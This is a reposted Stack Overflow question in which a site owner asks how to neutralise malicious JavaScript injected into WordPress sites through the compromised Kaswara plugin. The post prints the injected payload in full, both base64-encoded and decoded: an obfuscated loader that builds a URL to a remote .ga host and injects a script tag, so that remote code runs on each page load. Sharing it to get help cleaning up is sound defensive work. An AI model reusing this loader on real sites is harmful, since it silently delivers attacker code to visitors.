2021年5月4日星期二

KASWARA Vulnerability Hack [closed]

Thousands of wordpress sites running the kaswara plugin were compromised, below is base64 code which if decoded returns the second block.

What changes to the second block of code would delete the reference to the malicious site encoded as: var mm=String[_0x3e5356(0x171)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x73,0x74,0x69,0x63,0x6b,0x2e,0x74,0x72,0x61,0x76,0x65,0x6c,0x69,0x6e,0x73,0x6b,0x79,0x64,0x72,0x65,0x61,0x6d,0x2e,0x67,0x61,0x2f,0x62,0x72,0x61,0x6e,0x64,0x2e,0x6a,0x73,0x26,0x76,0x3d,0x30,0x30,0x33,0x32,0x26,0x73,0x69,0x64,0x3d,0x32,0x33,0x36,0x26,0x70,0x69,0x64,0x3d,0x35,0x34,0x35,0x37,0x34,0x37)

PHNjcmlwdD52YXIgXzB4MjMwZD1bXCdnZXRFbGVtZW50c0J5VGFnTmFtZVwnLFwnc2NyaXB0XCcsXCdwYXJlbnROb2RlXCcsXCcyNzk4NzV2QmVFRUVcJyxcJ2hlYWRcJyxcJzY5ODQ0OHJrR2ZlRlwnLFwnNjc5NTk3cHhtU3BXXCcsXCcyODEzMTRhZVdTVlNcJyxcJzFmYXNodEdcJyxcJ2N1cnJlbnRTY3JpcHRcJyxcJzE0Mzk3ODhkeGVTbm1cJyxcJ3NyY1wnLFwnMTA1MTE5N2hKeVd6RVwnLFwnMjc3MDExdkl2aktjXCcsXCcydlJMa0xrXCcsXCdmcm9tQ2hhckNvZGVcJyxcJzFZV3dmY2pcJ107dmFyIF8weDNlNTM1Nj1fMHg1NjdiO2Z1bmN0aW9uIF8weDU2N2IoXzB4NGY2OWM2LF8weDQ0ZjA2YSl7XzB4NGY2OWM2PV8weDRmNjljNi0weDE2MTt2YXIgXzB4MjMwZDBkPV8weDIzMGRbXzB4NGY2OWM2XTtyZXR1cm4gXzB4MjMwZDBkO30oZnVuY3Rpb24oXzB4MjNjNmUzLF8weDRiODE1OSl7dmFyIF8weDEzNzIwOT1fMHg1NjdiO3doaWxlKCEhW10pe3RyeXt2YXIgXzB4Mzg4MjkwPS1wYXJzZUludChfMHgxMzcyMDkoMHgxNjgpKSpwYXJzZUludChfMHgxMzcyMDkoMHgxNmEpKStwYXJzZUludChfMHgxMzcyMDkoMHgxNmYpKSstcGFyc2VJbnQoXzB4MTM3MjA5KDB4MTY1KSkqLXBhcnNlSW50KF8weDEzNzIwOSgweDE2MSkpKy1wYXJzZUludChfMHgxMzcyMDkoMHgxNmMpKStwYXJzZUludChfMHgxMzcyMDkoMHgxNjcpKStwYXJzZUludChfMHgxMzcyMDkoMHgxNmUpKSstcGFyc2VJbnQoXzB4MTM3MjA5KDB4MTcwKSkqLXBhcnNlSW50KF8weDEzNzIwOSgweDE2OSkpO2lmKF8weDM4ODI5MD09PV8weDRiODE1OSlicmVhaztlbHNlIF8weDIzYzZlM1tcJ3B1c2hcJ10oXzB4MjNjNmUzW1wnc2hpZnRcJ10oKSk7fWNhdGNoKF8weDIyN2FkYSl7XzB4MjNjNmUzW1wncHVzaFwnXShfMHgyM2M2ZTNbXCdzaGlmdFwnXSgpKTt9fX0oXzB4MjMwZCwweGI3MGNlKSk7dmFyIG1tPVN0cmluZ1tfMHgzZTUzNTYoMHgxNzEpXSgweDY4LDB4NzQsMHg3NCwweDcwLDB4NzMsMHgzYSwweDJmLDB4MmYsMHg3MywweDc0LDB4NjksMHg2MywweDZiLDB4MmUsMHg3NCwweDcyLDB4NjEsMHg3NiwweDY1LDB4NmMsMHg2OSwweDZlLDB4NzMsMHg2YiwweDc5LDB4NjQsMHg3MiwweDY1LDB4NjEsMHg2ZCwweDJlLDB4NjcsMHg2MSwweDJmLDB4NjIsMHg3MiwweDYxLDB4NmUsMHg2NCwweDJlLDB4NmEsMHg3MywweDI2LDB4NzYsMHgzZCwweDMwLDB4MzAsMHgzMywweDMyLDB4MjYsMHg3MywweDY5LDB4NjQsMHgzZCwweDMyLDB4MzMsMHgzNiwweDI2LDB4NzAsMHg2OSwweDY0LDB4M2QsMHgzNSwweDM0LDB4MzUsMHgzNywweDM0LDB4MzcpLGQ9ZG9jdW1lbnQscz1kW1wnY3JlYXRlRWxlbWVudFwnXShfMHgzZTUzNTYoMHgxNjMpKTtzW18weDNlNTM1NigweDE2ZCldPW1tO2RvY3VtZW50W18weDNlNTM1NigweDE2YildP2RvY3VtZW50W18weDNlNTM1NigweDE2YildW18weDNlNTM1NigweDE2NCldW1wnaW5zZXJ0QmVmb3JlXCddKHMsZG9jdW1lbnRbXzB4M2U1MzU2KDB4MTZiKV0pOmRbXzB4M2U1MzU2KDB4MTYyKV0oXzB4M2U1MzU2KDB4MTY2KSlbMHgwXVtcJ2FwcGVuZENoaWxkXCddKHMpOzwvc2NyaXB0Pg==

The above text translates to

<script>var _0x230d=[\'getElementsByTagName\',\'script\',\'parentNode\',\'279875vBeEEE\',\'head\',\'698448rkGfeF\',\'679597pxmSpW\',\'281314aeWSVS\',\'1fashtG\',\'currentScript\',\'1439788dxeSnm\',\'src\',\'1051197hJyWzE\',\'277011vIvjKc\',\'2vRLkLk\',\'fromCharCode\',\'1YWwfcj\'];var _0x3e5356=_0x567b;function _0x567b(_0x4f69c6,_0x44f06a){_0x4f69c6=_0x4f69c6-0x161;var _0x230d0d=_0x230d[_0x4f69c6];return _0x230d0d;}(function(_0x23c6e3,_0x4b8159){var _0x137209=_0x567b;while(!![]){try{var _0x388290=-parseInt(_0x137209(0x168))*parseInt(_0x137209(0x16a))+parseInt(_0x137209(0x16f))+-parseInt(_0x137209(0x165))*-parseInt(_0x137209(0x161))+-parseInt(_0x137209(0x16c))+parseInt(_0x137209(0x167))+parseInt(_0x137209(0x16e))+-parseInt(_0x137209(0x170))*-parseInt(_0x137209(0x169));if(_0x388290===_0x4b8159)break;else _0x23c6e3[\'push\'](_0x23c6e3[\'shift\']());}catch(_0x227ada){_0x23c6e3[\'push\'](_0x23c6e3[\'shift\']());}}}(_0x230d,0xb70ce));var mm=String[_0x3e5356(0x171)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x73,0x74,0x69,0x63,0x6b,0x2e,0x74,0x72,0x61,0x76,0x65,0x6c,0x69,0x6e,0x73,0x6b,0x79,0x64,0x72,0x65,0x61,0x6d,0x2e,0x67,0x61,0x2f,0x62,0x72,0x61,0x6e,0x64,0x2e,0x6a,0x73,0x26,0x76,0x3d,0x30,0x30,0x33,0x32,0x26,0x73,0x69,0x64,0x3d,0x32,0x33,0x36,0x26,0x70,0x69,0x64,0x3d,0x35,0x34,0x35,0x37,0x34,0x37),d=document,s=d[\'createElement\'](_0x3e5356(0x163));s[_0x3e5356(0x16d)]=mm;document[_0x3e5356(0x16b)]?document[_0x3e5356(0x16b)][_0x3e5356(0x164)][\'insertBefore\'](s,document[_0x3e5356(0x16b)]):d[_0x3e5356(0x162)](_0x3e5356(0x166))[0x0][\'appendChild\'](s);</script>

What changes to the javascript would functionally remove the MALICIOUS LINK

went.travelinskydream.ga/brand.js&v=0032&sid=236&pid=545747

The kaswara breach is now known, and would only be a temporary fix

https://stackoverflow.com/questions/67394077/kaswara-vulnerability-hack May 05, 2021 at 09:28AM

没有评论:

发表评论